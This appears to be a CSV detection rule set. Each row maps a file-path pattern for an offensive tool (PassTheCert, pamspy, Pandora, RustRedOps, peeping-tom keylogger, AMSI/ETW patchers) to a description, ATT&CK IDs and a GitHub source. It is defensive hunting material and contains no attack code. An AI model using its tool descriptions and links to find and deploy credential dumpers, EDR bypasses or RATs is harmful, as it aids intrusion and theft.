"*\p0wnedPotato.*",".{0,1000}\\p0wnedPotato\..{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","17079"
"*\p0wnedSystem.*",".{0,1000}\\p0wnedSystem\..{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","17080"
"*\padre\pkg\exploit*",".{0,1000}\\padre\\pkg\\exploit.{0,1000}","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/glebarez/padre","1","0","N/A","N/A","8","3","253","24","2024-05-13T14:28:25Z","2019-12-30T13:52:03Z","17081"
"*\Pain RAT.exe*",".{0,1000}\\Pain\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17095"
"*\paloalto_enum_globalprotectportal.py*",".{0,1000}\\paloalto_enum_globalprotectportal\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17096"
"*\paloalto_spray_globalprotectportal.py*",".{0,1000}\\paloalto_spray_globalprotectportal\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17097"
"*\pamspy.bpf.c*",".{0,1000}\\pamspy\.bpf\.c.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","17098"
"*\pamspy_event.h*",".{0,1000}\\pamspy_event\.h.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","17099"
"*\Pandora RAT V*.exe*",".{0,1000}\\Pandora\sRAT\sV.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17100"
"*\pandora.cpp*",".{0,1000}\\pandora\.cpp.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","17101"
"*\pandora.sln*",".{0,1000}\\pandora\.sln.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","17102"
"*\papacat.ps1*",".{0,1000}\\papacat\.ps1.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","N/A","8","4","309","25","2024-08-21T23:10:08Z","2021-05-11T06:26:10Z","17103"
"*\papacat.ps1*",".{0,1000}\\papacat\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17104"
"*\papacat.zip*",".{0,1000}\\papacat\.zip.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","N/A","8","4","309","25","2024-08-21T23:10:08Z","2021-05-11T06:26:10Z","17105"
"*\Parasite Invoke.csproj*",".{0,1000}\\Parasite\sInvoke\.csproj.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","17106"
"*\Parasite Invoke.exe*",".{0,1000}\\Parasite\sInvoke\.exe.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","17107"
"*\Parasite Invoke.pdb*",".{0,1000}\\Parasite\sInvoke\.pdb.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","17108"
"*\Parasite Invoke.sln*",".{0,1000}\\Parasite\sInvoke\.sln.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","17109"
"*\Parasite Invoke\*",".{0,1000}\\Parasite\sInvoke\\.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","17110"
"*\Parasite-Invoke-main*",".{0,1000}\\Parasite\-Invoke\-main.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","17111"
"*\ParsedMalleableData.txt*",".{0,1000}\\ParsedMalleableData\.txt.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","17112"
"*\parsers\nessus.py*",".{0,1000}\\parsers\\nessus\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17113"
"*\PassSpray.ps1*",".{0,1000}\\PassSpray\.ps1.{0,1000}","offensive_tool_keyword","PassSpray","Domain Password Spray","T1110.003 - T1078","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/PassSpray","1","0","N/A","N/A","10","1","7","3","2025-02-20T10:07:43Z","2023-11-16T13:35:49Z","17114"
"*\PassTheCert.cs*",".{0,1000}\\PassTheCert\.cs.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","17115"
"*\PassTheCert.exe*",".{0,1000}\\PassTheCert\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","17116"
"*\PassTheCert.exe*",".{0,1000}\\PassTheCert\.exe.{0,1000}","offensive_tool_keyword","PassTheCert","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PassTheCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17117"
"*\PassTheCert.exe*",".{0,1000}\\PassTheCert\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PassTheCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17118"
"*\PassTheCert.exe*",".{0,1000}\\PassTheCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","17119"
"*\PassTheCert.pdb*",".{0,1000}\\PassTheCert\.pdb.{0,1000}","offensive_tool_keyword","PassTheCert","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PassTheCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17120"
"*\PassTheCert.pdb*",".{0,1000}\\PassTheCert\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PassTheCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17121"
"*\PassTheCert.sln*",".{0,1000}\\PassTheCert\.sln.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","17122"
"*\PassTheChallenge\PassTheChallenge\*",".{0,1000}\\PassTheChallenge\\PassTheChallenge\\.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","17123"
"*\passwarden\app\getCredspasswarden.h*",".{0,1000}\\passwarden\\app\\getCredspasswarden\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","17124"
"*\passwarden\app\getCredspasswarden2.h*",".{0,1000}\\passwarden\\app\\getCredspasswarden2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","17125"
"*\password.lst*",".{0,1000}\\password\.lst.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","17126"
"*\passwordboss\app\getCredspasswordbossapp1.h*",".{0,1000}\\passwordboss\\app\\getCredspasswordbossapp1\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","17127"
"*\passwordboss\app\getCredspasswordbossapp2.h*",".{0,1000}\\passwordboss\\app\\getCredspasswordbossapp2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","17128"
"*\Passwordfiles.txt*",".{0,1000}\\Passwordfiles\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","17129"
"*\passwords.doc*",".{0,1000}\\passwords\.doc.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","17130"
"*\Passwords.docx*",".{0,1000}\\Passwords\.docx.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","17131"
"*\passwords.docx*",".{0,1000}\\passwords\.docx.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","17132"
"*\passwords.txt*",".{0,1000}\\passwords\.txt.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","17133"
"*\passwords.xls*",".{0,1000}\\passwords\.xls.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","17134"
"*\passwords.xlsx*",".{0,1000}\\passwords\.xlsx.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","17135"
"*\PasswordStealer.dll*",".{0,1000}\\PasswordStealer\.dll.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","17136"
"*\patch_amsi.exe*",".{0,1000}\\patch_amsi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","17137"
"*\Patch_AMSI.py*",".{0,1000}\\Patch_AMSI\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","17138"
"*\Patch_AMSI.vba*",".{0,1000}\\Patch_AMSI\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","17139"
"*\patch_etw.exe*",".{0,1000}\\patch_etw\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","17140"
"*\patch_exit.exe*",".{0,1000}\\patch_exit\.exe.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","17141"
"*\PatchingAPI.cpp*",".{0,1000}\\PatchingAPI\.cpp.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","17142"
"*\PatchingAPI.cpp*",".{0,1000}\\PatchingAPI\.cpp.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","N/A","9","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","17143"
"*\PatchingAPI.exe*",".{0,1000}\\PatchingAPI\.exe.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","N/A","9","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","17144"
"*\path_traversal_dict.txt*",".{0,1000}\\path_traversal_dict\.txt.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","17145"
"*\payload.exe*",".{0,1000}\\payload\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","17146"
"*\payload.hta*",".{0,1000}\\payload\.hta.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","17147"
"*\payload_placement.exe*",".{0,1000}\\payload_placement\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","17148"
"*\PayloadGen.ps1*",".{0,1000}\\PayloadGen\.ps1.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","17149"
"*\Payloads\*.bin*",".{0,1000}\\Payloads\\.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","17150"
"*\payloadtests.py*",".{0,1000}\\payloadtests\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","17151"
"*\pe2sh.exe*",".{0,1000}\\pe2sh\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","17179"
"*\PEASS-ng*",".{0,1000}\\PEASS\-ng.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","17180"
"*\peeping-client.exe*",".{0,1000}\\peeping\-client\.exe.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","N/A","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","17181"
"*\peeping-tom.exe*",".{0,1000}\\peeping\-tom\.exe.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","N/A","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","17182"
